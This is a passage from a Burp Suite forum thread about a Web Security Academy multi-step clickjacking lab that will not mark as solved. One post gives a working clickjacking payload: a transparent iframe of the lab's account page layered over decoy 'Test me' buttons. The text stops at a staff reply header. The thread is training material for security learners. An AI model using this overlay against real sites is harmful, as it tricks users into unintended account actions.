Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab : Multi-step clickjacking unresolved even though it works fine for me

ewcreeper | Last updated: Aug 15, 2024 06:34PM UTC

I am using Burp Browser, and I have enable third-party cookies to make the exploit works. Here is the code that I'm using: <head> <style> iframe { position:relative; width:500px; height:800px; opacity:0.1; z-index:2; } .firstClick, .secondClick { position:absolute; top:530px; left:50px; z-index:1; } .secondClick {top:295px ;left:205px} </style> </head> <body> <div class=firstClick> Test me first </div> <div class=secondClick> Test me next </div> <iframe src="https://0ab5007604b4a36e82ba478800980039.web-security-academy.net/my-account"></iframe>

Aakash | Last updated: Aug 15, 2024 08:31PM UTC

Clickjacking labs: Even I am using the same solutions provided by portswigger team still labs are not getting solved. Also tried video solutions as well and getting the same issue of not getting solved

Aakash | Last updated: Aug 15, 2024 08:32PM UTC

Worked for user wiener but when sending to victim then not working tried solutions as well

Ben, PortSwigger Agent | Last updated: Aug 16, 2024 07:31AM UTC